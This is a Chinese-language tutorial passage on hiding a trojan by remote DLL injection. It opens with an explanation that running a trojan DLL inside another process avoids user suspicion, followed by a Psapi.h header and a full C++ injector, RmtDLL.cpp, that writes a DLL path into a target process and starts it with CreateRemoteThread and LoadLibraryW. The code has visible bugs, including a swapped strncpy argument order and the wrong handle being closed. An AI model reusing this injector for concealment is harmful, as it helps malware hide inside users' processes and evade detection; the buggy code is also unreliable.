href="file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/01/clip_filelist.xml" rel="File-List" />
DLL
木马
LL32
的方法进行进程隐藏是简易的,非常容易被识破的,进程列表中出现多个
Rundll32.exe
容易引起用户的怀疑,故我们要采取远程注入的方式实现进程的隐藏。可以用远程线程技术启动木马
DLL
,也可以事先将一段代码复制到远程的内存空间,然后通过远程线程启动这段代码。无论是采用哪种方式,都是让木马的核心代码运行于别的进程的内存空间,这样不仅能很好的隐藏自己,也能更好的保护自己。此时的木马,不仅欺骗,进入计算机,甚至进入了用户进程的内部。 Psapi.h
#ifndef _PSAPI_H_
#define _PSAPI_H_
#if _MSC_VER > 1000
#pragma once
#endif
#ifdef __cplusplus
extern "C" {
#endif
BOOL
WINAPI
EnumProcesses(
DWORD * lpidProcess,
DWORD cb,
DWORD * cbNeeded
);
BOOL
WINAPI
EnumProcessModules(
HANDLE hProcess,
HMODULE *lphModule,
DWORD cb,
LPDWORD lpcbNeeded
);
DWORD
WINAPI
GetModuleBaseNameA(
HANDLE hProcess,
HMODULE hModule,
LPSTR lpBaseName,
DWORD nSize
);
DWORD
WINAPI
GetModuleBaseNameW(
HANDLE hProcess,
HMODULE hModule,
LPWSTR lpBaseName,
DWORD nSize
);
#ifdef UNICODE
#define GetModuleBaseName GetModuleBaseNameW
#else
#define GetModuleBaseName GetModuleBaseNameA
#endif // !UNICODE
DWORD
WINAPI
GetModuleFileNameExA(
HANDLE hProcess,
HMODULE hModule,
LPSTR lpFilename,
DWORD nSize
);
DWORD
WINAPI
GetModuleFileNameExW(
HANDLE hProcess,
HMODULE hModule,
LPWSTR lpFilename,
DWORD nSize
);
#ifdef UNICODE
#define GetModuleFileNameEx GetModuleFileNameExW
#else
#define GetModuleFileNameEx GetModuleFileNameExA
#endif // !UNICODE
typedef struct _MODULEINFO {
LPVOID lpBaseOfDll;
DWORD SizeOfImage;
LPVOID EntryPoint;
} MODULEINFO, *LPMODULEINFO;
BOOL
WINAPI
GetModuleInformation(
HANDLE hProcess,
HMODULE hModule,
LPMODULEINFO lpmodinfo,
DWORD cb
);
BOOL
WINAPI
EmptyWorkingSet(
HANDLE hProcess
);
BOOL
WINAPI
QueryWorkingSet(
HANDLE hProcess,
PVOID pv,
DWORD cb
);
BOOL
WINAPI
InitializeProcessForWsWatch(
HANDLE hProcess
);
typedef struct _PSAPI_WS_WATCH_INFORMATION {
LPVOID FaultingPc;
LPVOID FaultingVa;
} PSAPI_WS_WATCH_INFORMATION, *PPSAPI_WS_WATCH_INFORMATION;
BOOL
WINAPI
GetWsChanges(
HANDLE hProcess,
PPSAPI_WS_WATCH_INFORMATION lpWatchInfo,
DWORD cb
);
DWORD
WINAPI
GetMappedFileNameW(
HANDLE hProcess,
LPVOID lpv,
LPWSTR lpFilename,
DWORD nSize
);
DWORD
WINAPI
GetMappedFileNameA(
HANDLE hProcess,
LPVOID lpv,
LPSTR lpFilename,
DWORD nSize
);
#ifdef UNICODE
#define GetMappedFileName GetMappedFileNameW
#else
#define GetMappedFileName GetMappedFileNameA
#endif // !UNICODE
BOOL
WINAPI
EnumDeviceDrivers(
LPVOID *lpImageBase,
DWORD cb,
LPDWORD lpcbNeeded
);
DWORD
WINAPI
GetDeviceDriverBaseNameA(
LPVOID ImageBase,
LPSTR lpBaseName,
DWORD nSize
);
DWORD
WINAPI
GetDeviceDriverBaseNameW(
LPVOID ImageBase,
LPWSTR lpBaseName,
DWORD nSize
);
#ifdef UNICODE
#define GetDeviceDriverBaseName GetDeviceDriverBaseNameW
#else
#define GetDeviceDriverBaseName GetDeviceDriverBaseNameA
#endif // !UNICODE
DWORD
WINAPI
GetDeviceDriverFileNameA(
LPVOID ImageBase,
LPSTR lpFilename,
DWORD nSize
);
DWORD
WINAPI
GetDeviceDriverFileNameW(
LPVOID ImageBase,
LPWSTR lpFilename,
DWORD nSize
);
#ifdef UNICODE
#define GetDeviceDriverFileName GetDeviceDriverFileNameW
#else
#define GetDeviceDriverFileName GetDeviceDriverFileNameA
#endif // !UNICODE
// Structure for GetProcessMemoryInfo()
typedef struct _PROCESS_MEMORY_COUNTERS {
DWORD cb;
DWORD PageFaultCount;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
SIZE_T QuotaPeakPagedPoolUsage;
SIZE_T QuotaPagedPoolUsage;
SIZE_T QuotaPeakNonPagedPoolUsage;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
} PROCESS_MEMORY_COUNTERS;
typedef PROCESS_MEMORY_COUNTERS *PPROCESS_MEMORY_COUNTERS;
#if (_WIN32_WINNT >= 0x0501)
typedef struct _PROCESS_MEMORY_COUNTERS_EX {
DWORD cb;
DWORD PageFaultCount;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
SIZE_T QuotaPeakPagedPoolUsage;
SIZE_T QuotaPagedPoolUsage;
SIZE_T QuotaPeakNonPagedPoolUsage;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
SIZE_T PrivateUsage;
} PROCESS_MEMORY_COUNTERS_EX;
typedef PROCESS_MEMORY_COUNTERS_EX *PPROCESS_MEMORY_COUNTERS_EX;
#endif
BOOL
WINAPI
GetProcessMemoryInfo(
HANDLE Process,
PPROCESS_MEMORY_COUNTERS ppsmemCounters,
DWORD cb
);
typedef struct _PERFORMACE_INFORMATION {
DWORD cb;
SIZE_T CommitTotal;
SIZE_T CommitLimit;
SIZE_T CommitPeak;
SIZE_T PhysicalTotal;
SIZE_T PhysicalAvailable;
SIZE_T SystemCache;
SIZE_T KernelTotal;
SIZE_T KernelPaged;
SIZE_T KernelNonpaged;
SIZE_T PageSize;
DWORD HandleCount;
DWORD ProcessCount;
DWORD ThreadCount;
} PERFORMACE_INFORMATION, *PPERFORMACE_INFORMATION;
BOOL
WINAPI
GetPerformanceInfo (
PPERFORMACE_INFORMATION pPerformanceInformation,
DWORD cb
);
typedef struct _ENUM_PAGE_FILE_INFORMATION {
DWORD cb;
DWORD Reserved;
SIZE_T TotalSize;
SIZE_T TotalInUse;
SIZE_T PeakUsage;
} ENUM_PAGE_FILE_INFORMATION, *PENUM_PAGE_FILE_INFORMATION;
typedef BOOL (*PENUM_PAGE_FILE_CALLBACKW) (LPVOID pContext, PENUM_PAGE_FILE_INFORMATION pPageFileInfo, LPCWSTR lpFilename);
typedef BOOL (*PENUM_PAGE_FILE_CALLBACKA) (LPVOID pContext, PENUM_PAGE_FILE_INFORMATION pPageFileInfo, LPCSTR lpFilename);
BOOL
WINAPI
EnumPageFilesW (
PENUM_PAGE_FILE_CALLBACKW pCallBackRoutine,
LPVOID pContext
);
BOOL
WINAPI
EnumPageFilesA (
PENUM_PAGE_FILE_CALLBACKA pCallBackRoutine,
LPVOID pContext
);
#ifdef UNICODE
#define PENUM_PAGE_FILE_CALLBACK PENUM_PAGE_FILE_CALLBACKW
#define EnumPageFiles EnumPageFilesW
#else
#define PENUM_PAGE_FILE_CALLBACK PENUM_PAGE_FILE_CALLBACKA
#define EnumPageFiles EnumPageFilesA
#endif // !UNICODE
DWORD
WINAPI
GetProcessImageFileNameA(
HANDLE hProcess,
LPSTR lpImageFileName,
DWORD nSize
);
DWORD
WINAPI
GetProcessImageFileNameW(
HANDLE hProcess,
LPWSTR lpImageFileName,
DWORD nSize
);
#ifdef UNICODE
#define GetProcessImageFileName GetProcessImageFileNameW
#else
#define GetProcessImageFileName GetProcessImageFileNameA
#endif // !UNICODE
#ifdef __cplusplus
}
#endif
#endif
RmtDLL.cpp #include<windows.h>
#include<stdlib.h>
#include<stdio.h>
#include "Psapi.h"
DWORD ProcessToPID(char *);
void CheckError(int,int,char *);
void usage(char *);
PDWORD pdwThreadId;
HANDLE hRemoteThread,hRemoteProcess;
DWORD fdwCreate,dwStackSize,dwRemoteProcessId;
PWSTR pszLibFileRemote=NULL;
void main(int argc,char **argv)
{
int iReturnCode;
char lpDllFullPathName[MAX_PATH];
WCHAR pszLibFileName[MAX_PATH]={0};
if(argc!=3)
usage("parametes number incorrect!");
else
{
printf("%sldskglisagi");
if(isdigit(*argv[1]))
dwRemoteProcessId=atoi(argv[1]);
else
dwRemoteProcessId = ProcessToPID(argv[1]);
if(strstr(argv[2],"://")!=NULL)
strncpy(argv[2],lpDllFullPathName,MAX_PATH);
else
{
iReturnCode=GetCurrentDirectory(MAX_PATH,lpDllFullPathName);
CheckError(iReturnCode,0,"GetCurrentDirectory");
strcat(lpDllFullPathName,"//");
strcat(lpDllFullPathName,argv[2]);
printf("Convert DLL filename to FullPathName:/n/n%s/n/n",lpDllFullPathName);
}
iReturnCode=(int)_lopen(lpDllFullPathName,OF_READ);
CheckError(iReturnCode,HFILE_ERROR,"DLL File not Exist");
iReturnCode=MultiByteToWideChar(CP_ACP,MB_ERR_INVALID_CHARS,lpDllFullPathName,strlen(lpDllFullPathName),pszLibFileName,MAX_PATH);
CheckError(iReturnCode,0,"MultByteToWideChar");
wprintf(L"Will inject %s",pszLibFileName);
printf("intoprocess:%sPID=%d/n",argv[1],dwRemoteProcessId);
}
hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);
CheckError((int) hRemoteProcess, NULL,"Remote Process not Exist or Access Denide!");
int cb=(1+lstrlenW(pszLibFileName)) *sizeof(WCHAR);
pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,MEM_COMMIT,PAGE_READWRITE);
CheckError((int)pszLibFileRemote,NULL,"VirtualAllocEx");
iReturnCode=WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(PVOID)pszLibFileName,cb,NULL);
CheckError(iReturnCode,false,"WriteProcessMemory");
PTHREAD_START_ROUTINE pfnStartAddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")),"LoadLibraryW");
CheckError((int)pfnStartAddr,NULL,"GetProcAddress");
hRemoteThread=CreateRemoteThread(hRemoteProcess,NULL,0,pfnStartAddr,pszLibFileRemote,0,NULL);
CheckError((int)pfnStartAddr,NULL,"Create Remote Thread");
WaitForSingleObject(hRemoteThread,INFINITE);
if(pszLibFileRemote!=NULL)
VirtualFreeEx(hRemoteProcess,pszLibFileRemote,0,MEM_RELEASE);
if(hRemoteThread!=NULL)
CloseHandle(hRemoteThread);
if(hRemoteProcess!=NULL)
CloseHandle(hRemoteThread);
}
DWORD ProcessToPID(char *InputProcessName)
{
DWORD aProcess[1024],cbNeeded,cProcesses;
unsigned int i;
HANDLE hProcess;
HMODULE hMod;
char szProcessName[MAX_PATH] = "UnkonwnProcess";
//计算目前有多少进程,aProcesses[]用来存放有效的进程PIDs
if(!EnumProcesses(aProcess,sizeof(aProcess),&cbNeeded))
return 0;
cProcesses = cbNeeded / sizeof(DWORD);
//按有效的PID遍历所有的进程
for(i=0; i<cProcesses; i++)
{
//打开特定PID的进程
hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,FALSE, aProcess[i]);
//获得特定PID的进程名
if( hProcess)
{
if(EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded))
{
GetModuleBaseName(hProcess, hMod,
szProcessName, sizeof(szProcessName));
if(!_stricmp(szProcessName,InputProcessName))
{
CloseHandle( hProcess );
return aProcess[i];
}
}
}//end of if( hProcess )
}//end of for
//没有找到相应的进程名,返回0
CloseHandle( hProcess );
return 0;
}//end of ProcessToPID
//错误处理函数CheckError()
//如果iReturnCode等于iErrorCode,则输出pErrorMsg并推出
void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)
{
if(iReturnCode == iErrorCode)
{
printf("%s Error:%d/n/n", pErrorMsg, GetLastError());
//清场处理
if(pszLibFileRemote != NULL)
VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
if(hRemoteThread != NULL)
CloseHandle(hRemoteThread);
if(hRemoteProcess != NULL)
CloseHandle(hRemoteProcess);
exit(0);
}
}//end of CheckError()
//使用方法说明函数usage()
void usage(char * pErrorMsg)
{
printf("%s/n/n",pErrorMsg);
printf("/t/tRemote Process DLL by liangshuai/n");
printf("/tThis program can inject a DLL into remote process/n");
printf("Email:/n");
printf("/tshuai52@126.com/n");
printf("USAGE:/n");
printf("/tRmtDLL.exe PID[|ProcessName] DLLFullPathName/n");
printf("Example:/n");
printf("/tRmtDLL.exe 1024 C://WINDOWS//System32//MyDLL.dll/n");
printf("/tRmtDLL.exe Explorer.exe C://MyDLL.dll/n");
exit(0);
}